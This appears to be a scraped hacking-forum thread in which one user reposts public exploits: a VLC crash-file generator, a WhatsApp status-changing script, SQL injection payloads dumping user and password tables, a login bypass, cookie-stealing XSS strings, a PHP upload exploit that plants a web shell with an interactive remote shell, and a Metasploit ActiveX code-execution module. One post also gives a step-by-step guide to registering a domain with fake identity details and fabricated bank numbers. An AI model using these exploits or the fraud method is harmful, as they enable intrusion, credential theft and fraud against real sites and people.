"49651b034b540fa34d6da6dea221b6cb530a78beaa890f6f35a42225fa57ee099e135e9cd3545127" "50607372304f737c43c12b796ca53b9284f705565214fda0ee4381050718c566af936f3d21950d38" "1441ad8b3a9a7c5870b0a79a8000ccb54094c54db091c1517c08815eeaa3f5a04ca9c7a4cd21e1a4" "d417697ab55cc85c8679281187b30e4f71864f9dec6aad593b429ac0b99077906b87b9d64c1e5af9" "f6aa41af722e39e4c202074fd24eab62874bd2d278a06fb6e04a22c280aea4dd5fa4ad18bce8a82a" "8d1157ba120ca22cda70e98213a0d98a93da5567d6c63d2835f1ad17922299afbaa6e955e0219edc" "28c4a539474d658b50cb7314a9f951df9b1b0b274bc037dd55a7dfe5e8447fdf43a7ecf971e7a8e7" "d1de52cfbece401141884e6a6f7c185a788d9bfe9c34aefb2a6212a184593a99f1f0dbbc517ee364" "0e830d2d5e1ccb7b2f14c8435bacbf46cf71e0a435b919b77be84d687c8af35930409a2c8642ca89" "5a76bf7e8bee7a6a030f09dcaccb269aef8b2da3948dc881ab74561b30d5f1fcf1b34541ad3e7b07" "0be599c3ec0c0b982d6e6def77ad34645b2921154ffd61e8a941ebdd753b601875bbbc5d10a33230" "675d106d16e8c61ac567bcd1d92eeb2f5275756bb2ea3db494805b3de4b10e5a8f0fecd48a491dff" "c657b2b0006a106c345dd6f52988f3b77d796e4b6139d1b1434b918b38d4d1100665386510623d6d" "3aa42910ccbe78f63edc0277224c4d37da32163705fba96c73fe6c5fb545da379604803d1e9050f1" "446f33d8348b63fe604e21cd75a879ddb4d40c16cb63f475c29931147b340b44750b1134d0bbe886" "52594cc9fb23fab95968a9f2206f5d44ba55bb8b18abc98cd2042d85d54d6f686b9c7ee7caf3ebfe" "8b5073b3d5fecef8a752e87a3455df056f44fb6bba30faf10f4c6890fa0a9859f468ebdcdef7229a" "5d0c1df739df7b2d2c4656cf043668450ba7ea057c9831668d2f13ab7db1158156539359f7236043" "6a149ee9a0b7f515e48bdff279672b40d5343a5c2b901dbcbbe4b33697a3b8dee78f0224e1898270" "d07110593fcea9f83fe85ebd008caa58832947802ebabc6a5e4209c6b849e594c3f40ec04cb38d44" "8ef36307c5b5e6bb43f1977b03854fab4be95ca0b15e8ab3932bd14f51e1c6d3a3aeeb6d6dc3709e" "440b0d69ce01069fbf76688681082ba6c42f8c965ab730df86fa64d78bd6cb302a1cb846d6432cba" "21ee3116d2c3e8dfd7baa94fa5337180aef0eab04aaad8a07629905bcaeddb3a350f5bd1a04e64ba" "4dd8cc1386a16177fe06b772312d7d44bc827376037e8643c80f02095a6fb190ffbe664497a35a39" "199ff8919b058afaca9dd0f7fadec2dc85436201c8d91343a56cdd031616f629044932e411c2bacc" "b1857980956c68c3efdd4a70a35cf4ed6b51427af19b7317a4935f02e537b392cb170846a54b298c" "26c1a6b99b8f5e749490c1bdc363afafe365eab2a4acd9e9e64ab143132e196ea1ad52299266dcd2" "0f93c3d131588e21c1eb04f3210ecdd0018ad6c1c18ab78c4937d2e3106be1b2d4a70ef2b7fb3309" "718a1593dee3fa79a17990f71732db855ded10d045d8ef139c2c4e2ed6bc0fbfca842f0b33348f6b" "144379544e9232acececb5633f66bb1c29c9cbc287dd0b6e284e15be6f797a0d1bd27eefdb10380f" "d410ac6b253d538c051ff24275ecdc61f91a80d982fed2ca2a2ce0b0cb7aef24a4a3ceb39f75067e" "428f658fde427c8c7a25657c7ec8fdfcaadc97383f7041eb8c152b55ed656e19d07637a7408489df" "99f99e07a803a07cca5116e3025aade3fb36067d77800686323d9f31d1d298f8b2713e149f56c620" "a37146263ac387201fe019684ab873ccbb740365bdb1674ef5ae1010ec7621f5a150c0b0fe99bc6f" "6f2f20740267b74611c553b709a3bcbd474ed8eec1e7c0ae89f49aadb81dee1e04528b68ac5e2c99" "4ab29af7f45ae9d286ab2a68df8462d4e7b1469fd07dd554004e5782ce989c67c0e9134cce018d6e" "725d786b8430f04ef6c9664a231bf0e6ca03554a94dc79355aecf433224bc0cf1952e6809455c82e" "68664e18214d047ca778a0666f211e88c353c5d9b6b6a50ac67fd798edf2d5d3dad642e3a52822ca" "1a65fae4889c9b32467f42c5c99851673eac2e069d3cda524bb05eb1e7edbbfdef9fa9e28b158ced" "60b29a9d08b1289087cb940b794cf7f839fd5e9ec442169a64c8dd6bfc1fb161e948f95ba7cac9b6" "6d4caa5467eb23e351cb73551943ebfda5205cd7126a3c27e80e0db4b2271b16421dfe7433fbd748" "281388943174b3f0b1d9925aa0e91045c48fe686e2cba903dbcc000872f5c874e980fe90571c2594" "205c8adf7393180cbee9de69de5b36734cd556fa006fd92967745a736725ae4c414425757f730d92" "c5e1b6ed16d25a45202b6848b0dd343a6976fd1c690ebac6e958831b554c599e1b57efbd68a41cf2" "5755855fdc94896e85832015ea648be8b9dbfdc8b7e05b6bf77413fe1789e8ced37ffbdea8a3ada7" "a1851b3d4e98198c1d771bbf387f4e1c1625b264d4f0fbf759d69a73177ed1226e35866d67b7101f" "d81da9ef313c2eaaa6a718f73675e7dd67fa2a0d617289e749009ee0b257e88665099de78e66d04f" "ce4cb4f2c1f1b2df8fa6650bbf383ef3cc7d47c141a304470a09c5f59c8154917f5fe7df79c024b8" "329ec3183f94c7db29f59c8fd2753216e2c1228bab2c0ed0d1326806b3ebab1fd0f3836df3b811db" "6ece6385378f3325ecb01f4dd32404bcebcc41691452816a752b09e5c9d703956fb336b11717d8c0" "b7f5d62ca85c492083725d7d7f398219e170c1e42242158a95c492b1aad34b23b868f516707a043e" "f2c2ad6a7c28692212a0ab7bf578be3af31febeb28c8fc53d141474c913b1abd87d3506e90afc67e" "2d262519e7acb3bb630e7b63be97918f5ccedeb7e2409628abcac15b6c53f040a8dd4550bdc74f25" "63a60183505693ad547c0073cd355e39b6f26171faaea6b1e8adc6a9efcf69fc15d741a35fbd1112" "0c46d1267aa457bf396df4ed306406405f56b6c58c84894c9a40a2f0411054848db83fbb231ddef0" "b705c0ed0d36343c5ba5f1d7ae585536c515b1cfd45572860f92a24fe4ef1b158f914a023f70cebc" "76dbb211ec349d5625606669c9240354f9d4dbbf972b5bfa753cca5b2a33a2968e790a20ec351343" "5c5d047a537f5abc17d33b95c5db45e501d85f64d61764f40d1e8a1ea1a6a8af0b1ecc3d32e88385" "062ce55789446767676c7422170b5ff44c32ee4b83677e21bc730ba5ec1e973dbd0011171ee81a85" "7376e2c6c4a707d454ef4be7e58a9be7d42ae3ae8ab6d93effdfb026fd5c7931f525b887089d7454" "d808cdb0cc8b9a5a32ddc3a710c8db8453191949871f30b9f187260a99b6ebcd5bc50aa127468fe4" "3ea3bab060787df87aaeaf17f8961ff3930063f1749b046fc0cbfdfdcbd9c6d0342d3f6f98c167f2" "ab9d9cfa968592c9bf0f80faed8e569c482eb5e26363739d0beaacf87d8aac4d674831dbcfa7a649" "73a2feb31abf127d404352db5e91518333c086ecc28349ac8fa963c5a174636f11a6d8aa0668123a" "30e4757f4fe2bc8b3dceeb94d05e5d52ecfa629aa1a91732d913249ec6a09a58cfa335c48d2ad60c" "b8a5fcbc923b8c5445da1af8713952579e47184f44264097875b14e3221e3fa45f054fd702842d5d" "55b3d80dffb7fdda9b34c2674c4c3a6af4f5ce24af5b0d59037cf760b06a2b226779ac0cd0146cbf" "cdf46f32ff0cd66c4942bff42e0093bd496c4f4956bf5290ab8d9ab953198d4645dcf666359d26e4" "2c8881872c2f8315c9af27ed964c289098e8e26c29d4907f243c61cf0c939c3f240406935569a13c" "b838136fad59391bbfb0bd3c70027b1dd1bb77a4e226c5b4267ca58d4d676cf69b0c4fc39c7c0cc0" "b14f1c8bbc9223ef88e208a8ee6db22a2af4640d8adcec686ef31dfef960fde679d357c5cac24d14" "d36d0979903df3f8f6087171282df0c0dbf7c32f0e83abfa384dadc1c27553ef06ff8eae6698ae93" "597c64ae5865f98f3e2e17bcdf4f2166a579e52db6d17127d53f8c1d5400ccec6df6f061f802f53a" "0175fbab8362c2c157175ca803a8bbee7d0785b826edfc682e37e2b6dc294c66d236903b2f2e7e85" "790919a918658eafab180e4ef279dfe65bcf01de39a49ca9daa28f855fb7b66b81251913518a7334" "90e656eaf56a3082c80fc8534dd8e873033fc1ea9c491f95cf291a03e759d55567521ea0ed1f8eb1" "baf4a47546d46279a5b36c6911457ca054f53239b4e8f6ed336394699ff77fa571b473f739c1f50b" "4c346a056e842c403ce8c03c7e26984b5358f1d521718ce65365920c75273ad43cc7b964bf5e3e2d" "83a6f4657adca859034672441a45fd60cf52e35482ee81451c5f237361144cae309e9c1ff3dd8fb2" "c621a6fcbeecaf3cabf662247f08603ea9c916d08b932b9201e1cd232624129e48170db7d0945002" "f7ab2c7298fed8733492d588bcb95bd0cefb60de463e2084d31d15edd3c0e46ea4d415ef38550859" "c9008879e6b2d809af2f64634e0373faed2814050de2482616cfa90335d8aa46830f1e75e1332274" "fc06e1d986bb8998bf61fc0c509c61f44a420448750e636ec91632e2f3d8c2e05b390e35e3de5628" "eb2c759a7a8b2ef255f4d8ede048cb9a9061162d8276e626aa375f023ecefec2567c1eb3a7f92d68" "242ba94387fd841bc995d474bad3229500546aeb7b3dec654c021c638e57599f403e8bacd1aa1273" "eeae3692a11e6857338a023860180cd58e68db4819a77c29d1e8e60e684e1f2760db39f02ca50861" "4040bbaaa154fdb6312b5f62cb4cb7dc62473ad4734f9bd968eaa2facac02c3cabba248558d41eaa" "04cea15b28b997b9c92e2de886f182a4236188c6914c6e8c9782bad91d18e987e08df1916ad844fc" "7291657e70182443e8c454428cede54b83abaf843f96f520ba02303d25dff65ac5d15901ebc3ca10" "c23472bef438bf550ef609c2b41927aae0d9426119694464250ee9b5e2c968209d5bf6e2228dd165" "aa54d448ab035501de167776619440bf5b43d6453f8139efce1168ad5b3fa6c7fdb2515b443997b5" "6e89025ed80cf5ac706712a222103c7fa7d57050075473de156debcbd18ae33ba677f41641a0a945" "7e05468793afd4c64020e8c1f3a496ecf3ed151ecb85fb02abaef639b001ede5600000000" ) # create the file f = open('vlc-dos.ape', 'wb') f.write( binascii.unhexlify(hexlified) ) f.close() print '[*] Vulnerable file, vlc-dos.ape, created' Sursa: VLC 1.2.0 (libtaglib_pluggin.dll) DoS
  6. The_Arhitect
    WhatsApp Status Changer v0.2 Exploit #!/bin/bash # # WhatsApp Status changer v0.2 stable # A slim exploit able to change the WhatsApp # user status in a remote way. # # This program is released under the terms of the GNU General Public License # (GPL), which is distributed with this software in the file "COPYING". # The GPL specifies the terms under which users may copy and use this software. # show_help(){ echo "" echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit" echo "" echo " --usage show the exploit Usage" echo " --credits show the exploit Credits" echo " --help show the Help" echo "" echo " enJoy" } show_credits(){ echo "" echo " Emanuele Gentili" echo " http://www.emanuelegentili.eu" echo " eg @ offensive-security.it" echo "" echo " Stefano Fratepietro" echo " http://steve.deftlinux.net" echo " stefano @ deftlinux.net" echo "" } show_usage(){ echo "" echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit" echo "" echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned" echo "" echo " enJoy" } # Bash while [[ $# != 0 ]]; do arg_name=$1; shift case "$arg_name" in --help|-?|-h) show_help; exit 0;; --credits) show_credits; exit 0;; --usage) show_usage; exit 0;; --countrycode) countrycode=$1; shift;; --mobilenum) mobilenum=$2; shift;; --text) text=$3; shift;; *) echo "invalid option: $1"; show_help;exit 1;; esac done [ -z "$countrycode" ] && { show_help; exit 1; } whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)" wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php echo "" echo "[+] Operazione completata." echo "" Sursa: WhatsApp Status Changer v0.2 Exploit
  7. The_Arhitect
    Tu nu dai search cand postezi ceva?
  8. The_Arhitect
    Megaupload.com a fost inchis. Creatorii lui au de platit o suma astronomica - www.yoda.ro
  9. The_Arhitect
    EasyPage SQL Injection Vulnerability # # Title : EasyPage SQL Injection Vulnerability # Author : Red Security TEAM # Date : 19/01/2012 # Risk : High # Vendor : http://karait.com/ # Tested On : Windows Server 2008 (Microsoft-IIS/7.5) # Dork : inurl:default.aspx?page=Document&app=Documents&docId=* # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/default.aspx?page=Document&app=Documents&docId=[SQLi] # # Example : # # [Get Database Name] # http://server/default.aspx?page=Document&app=Documents&docId=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1 # Sursa: EasyPage SQL Injection Vulnerability
  10. The_Arhitect
    ICTimeAttendance Authentication Bypass Vulnerability ) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- ICTimeAttendance Authentication Bypass Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : January, 19-2012 Location : Jakarta, Indonesia Time Zone : GMT +7:00 Application : ICTimeAttendance - Time attendance script Price : $57.09 Vendor : http://www.icloudcenter.com/ Exploit & p0c _____________ go to http://domain.tld/[path]/index.html then login with Username : admin Password : 1'or'1'='1 ShoutZ ______ All YOGYACARDERLINK CREW Sursa: ICTimeAttendance Authentication Bypass Vulnerability
  11. The_Arhitect
    appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit <?php /* --------------------------------------------------------------------- appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit --------------------------------------------------------------------- author............: Egidio Romano aka EgiX mail..............: n0b0d13s[at]gmail[dot]com software link.....: http://www.apprain.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] vulnerable code in /webroot/addons/uploadify/uploadify.php 27. if (!empty($_FILES)) { 28. $tempFile = $_FILES['Filedata']['tmp_name']; 29. //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/'; 30. $targetFile = "uploads/" . $_FILES['Filedata']['name']; 31. 32. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']); 33. // $fileTypes = str_replace(';','|',$fileTypes); 34. // $typesArray = split('\|',$fileTypes); 35. // $fileParts = pathinfo($_FILES['Filedata']['name']); 36. 37. // if (in_array($fileParts['extension'],$typesArray)) { 38. // Uncomment the following line if you want to make the directory if it doesn't exist 39. // mkdir(str_replace('//','/',$targetPath), 0755, true); 40. 41. move_uploaded_file($tempFile,$targetFile); 42. echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile); 43. // } else { 44. // echo 'Invalid file type.'; 45. // } 46. } Restricted access to this script isn't properly realized, so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. [-] Possible bug fix: include_once('../../../app.php'); App::__Obj('appRain_Base_Core')->check_admin_login(); add this lines of code at the beginning of the script [-] Disclosure timeline: [19/12/2011] - Vulnerability discovered [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135 [20/12/2011] - Vendor response and fix suggested [16/01/2012] - After four weeks still no fix released [19/01/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------------+"; print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |"; print "\n+---------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /apprain-v015/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n"); $packet = "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\napprain-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> Sursa: appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
  12. The_Arhitect
    PostNuke Module pnAddressbook SQL Injection Vulnerability # Exploit Title: PostNuke Module pnAddressbook SQL Injection Vulnerability # Date: 1/18/2012 # Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net ) # Tested on: [Linux/Windows 7] #Vulnerable parameter: id= ############################################################## PoC: http://server/index.php?module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass) FROM nuke_users-- ############################################################## www.areyousecure.net www.websiteauditing.org # Shouts to the Belegit crew Sursa: PostNuke Module pnAddressbook SQL Injection Vulnerability
  13. The_Arhitect
    Wordpress uCan Post plugin <= 1.0.09 Stored XSS # Exploit Title: Wordpress uCan Post plugin <= 1.0.09 Stored XSS # Dork: inurl:/wp-content/plugins/ucan-post/ # Date: 2012/01/18 # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip # Version: 1.0.09 1) You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages: * Name field is not sanitized and it's injectable with a payload which will be stored in the pending submission page in admin panel POC: myname'"><script>window.alert(document.cookie)</script> * Email field is not sanitized but can it will check for a valid email address so the maximum result will be a reflected xss POC: my@mail.com'"><script>window.alert(document.cookie)</script> * Post Title is not sanitized and it's injectable with a payload which will be stored in the pending submissions page in admin panel POC: title'"><script>window.alert(document.cookie)</script> Sursa: Wordpress uCan Post plugin <= 1.0.09 Stored XSS
  14. The_Arhitect
    Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS # Exploit Title: Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS # Google Dork: "inurl:"sites/all/modules/ckeditor" -drupalcode.org" # Google Results: Approximately 379.000 results # Date: 18th January 2012 # Author: MaXe @InterN0T (Found in a private Hatforce.com Penetration Test) # Software Link: http://ckeditor.com/ & http://drupal.org/node/1332022 # Version: 3.0 - Current 3.6.2 (Drupal module: 6.x-1.8) # Screenshot: If attached, see image file. # Tested on: Windows + FireFox 8.0 & Internet Explorer 8.0 Drupal CKEditor - Persistent / Stored Cross-Site Scripting Versions Affected: 3.0 - 3.6.2 (Developers confirm all versions since 3.0 are affected.) Info: CKEditor is a text editor to be used inside web pages. It's a WYSIWYG editor, which means that the text being edited on it looks as similar as possible to the results users have when publishing it. It brings to the web common editing features found on desktop editing applications like Microsoft Word and OpenOffice. External Links: http://ckeditor.com/ http://drupal.org/node/1332022 Credits: MaXe (@InterN0T) - Hatforce.com -:: The Advisory ::- CKEditor is prone to Persistent Cross-Site Scripting within the actual editor, as it is possible for an attacker could maliciously inject eventhandlers serving java- script code in preview / editing in html mode. If an attacker injects an eventhandler into an image, such as "onload='alert(0);'", then the javascript will execute, even if the data is saved and previewed in editing mode later on. (The XSS will only executing during preview / editing in html mode.) If an administrator tries to edit the comment afterward, or is logged in and browses to the edit page of the malicious comment, then he or she will execute the javascript, allowing attacker controlled code to run in the context of the browser. Proof of Concept: Switching to "raw mode" in CKEditor and then writing: <p><img onload="alert(0);" src="http://1.images.napster.com/mp3s/2348/resources/324/363/files/324363272.jpg" /></p> Will become this when it is saved: <p><img data-cke-pa-onload="alert(0);" src="http://1.images.napster.com/mp3s/2348/resources/324/363/files/324363272.jpg" data-cke-saved-src="http://1.images.napster.com/mp3s/2348/resources/324/363/files/324363272.jpg"></p> If one searches for alert(0); in Firebug after the code has been injected and executed, the location of the script will be: $full_url_to_script/event/seq/4/onload Where $full_url_to_script is e.g. the following: http://localhost/drupal/drupal-6.22/?q=comment/edit/3/event/seq/4/onload The content of this script is: function onload(event) { alert(0); } As there is a HTML filter in Drupal, it does not matter whether the <img> tag is allowed in this case, as it was possible to execute the eventhandler either way. (And even store the data.) -:: Solution ::- There is currently no solution, as it's not a critical bug according to developers. See comments at: https://dev.ckeditor.com/ticket/8630 for more information. At the same page there is an unofficial patch that should fix the problem, however it seems that it will not fix the bug in Chrome. Disclosure Information: 6th December 2011 - Vulnerability found during a private http://www.hatforce.com Penetration Test 7th December 2011 - Researched and confirmed the vulnerability 4th January 2012 - Reported to Drupal and CKEditor via http://drupal.org/project/ckeditor and http://dev.ckeditor.com/ and http://cksource.com/contact 18th January 2012 - Developers of CKEditor has been contacted several times, nothing has happened in two weeks and the advisory has been available to the public via bugtrackers. Vulnerability released to the general public. Sursa: Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS
  15. The_Arhitect
    How to get a free .com/.net/.org & more domain name 1) Go to: Hosting, Online harde schijf, Webshop, Server - STRATO Scroll down and find the box where it'll let you register a domain. Press "checken". 2) If it says your domain is "vrij" it's available. Click selectie overnemaan en doorgan. Click a package you want and press "Nu Bestellen" 3) In a different window / tab, go to Generate a Random Name - Fake Name Generator and fill in the strato page with the details from fakenamegenerator. For the Telefonnumber, make sure the area code is 020. Use your real e-mail though, so they can send you a verification e-mail. Fill out the rest of the information except for one box which doesn't need to be filled out. It doesn't have a "*" so it's not required. Click Volgende. 4) It'll take you to a review page, click Betaalgenam aaserpam or something like that. For reekingnummer, make sure that the first 4 digits are 8008 and then enter 3 random digits. Click Volgende. It'll take you to another review page. Go to the bottom and click Bestselling afslutim or something like that. 5) You've completed your order! Go to your e-mail and make sure you have an email from strato. In 24 hours or less, they'll send you another confirmation e-mail. Your domain will then be set up.
  16. The_Arhitect
    Nu ?i se pare c? cam exagereaz??
  17. The_Arhitect
    HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution', 'Description' => %q{ This module allows remote attackers to place arbitrary files on a users file system by abusing the "CacheDocumentXMLWithId" method from the "XMLCacheMgr" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrea Micalizzi', # aka rgod original discovery 'juan vazquez', # Metasploit module ], 'References' => [ [ 'CVE', '2011-4786'], [ 'BID', '51396'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-013/' ], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ #Windows before Vista [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 11 2012')) end # # The following handles deleting the copied vbs payload and mof file # See "struts_code_exec.rb" and "ms10_026_dbldecode.rb" for more information. # def on_new_session(client) if client.type != "meterpreter" print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") print_error("The vbs payload and mof file must be removed manually.") return end return if not @var_mof_name return if not @var_vbs_name # stdapi must be loaded before we can use fs.file client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") cmd = "C:\\windows\\system32\\attrib.exe -r " + "C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof" client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") end end def on_request_uri(cli, request) unless request['User-Agent'] =~ /MSIE/ send_not_found(cli) print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent") return end # Using Windows Management Instrumentation service to execute the payload. # Using code from "blackice_downloadimagefileurl.rb". See it for more information. var_xmlcachemgr = rand_text_alpha(rand(5)+5) var_mof_function_name = rand_text_alpha(rand(5)+5) content = <<-EOS <html> <head> <script> var #{var_xmlcachemgr} = new ActiveXObject('HPESPRIT.XMLCacheMgr.1'); function #{var_mof_function_name}() { #{var_xmlcachemgr}.CacheDocumentXMLWithId( "c:\\\\WINDOWS\\\\system32\\\\wbem\\\\mof\\\\#{@var_mof_name}.mof", unescape("#{@mof_content}"), 1, 1 ); } #{var_xmlcachemgr}.CacheDocumentXMLWithId( "C:\\\\WINDOWS\\\\system32\\\\#{@var_vbs_name}.vbs", unescape("#{@vbs_content}"), 1, 1 ); setTimeout("#{var_mof_function_name}()", 4000); </script> </head> </html> EOS print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) handler(cli) end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @var_mof_name = rand_text_alpha(rand(5)+5) @var_vbs_name = rand_text_alpha(rand(5)+5) print_status("Encoding payload into vbs...") payload = generate_payload_exe @vbs_content = Rex::Text.to_hex(Msf::Util::EXE.to_exe_vbs(payload)) print_status("Generating mof file...") @mof_content = Rex::Text.to_hex(generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")) super end end Sursa: HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution
  18. The_Arhitect
    deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability ======================================================================================== | # Title : deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability | # Author : Easy Laster | # Download : http://www.modsbar.de/Addons/79/moviebase/ | # Script : deV!L`z Clanportal 1.5.5 Moviebase | # Price : 20 | # Bug : Blind SQL Injection | # Date : 12.01.2012 | # Language : PHP | # Status : vulnerable/Non-Public | # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah ====================== Proof of Concept ================================= [+] Vulnerability movies/index.php?action=showkat&id= [+] Injectable #true http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=1--+ #false http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=2--+ [-] The SQL Injection Filter Function must be bypassed () Sursa: deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability
  19. The_Arhitect
    deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability ======================================================================================== | # Title : deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability | # Author Easy Laster | # Download : http://www.modsbar.de/Addons/464/gamebase-addon/ | # Script : deV!L`z Clanportal Gamebase Addon | # Price : 20 | # Bug : SQL Injection | # Date : 05.01.2012 | # Language : PHP | # Status : vulnerable/Non-Public | # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah ====================== Proof of Concept ================================= [+] Vulnerability gamebase/?action=detail&gameid= [+] Injectable http://[host]/[path]/gamebase/?action=detail&gameid=1+union+select+1,2,3,4,5,nick, pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dzcp_users+where+id=1--+ Sursa: deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability
  20. The_Arhitect
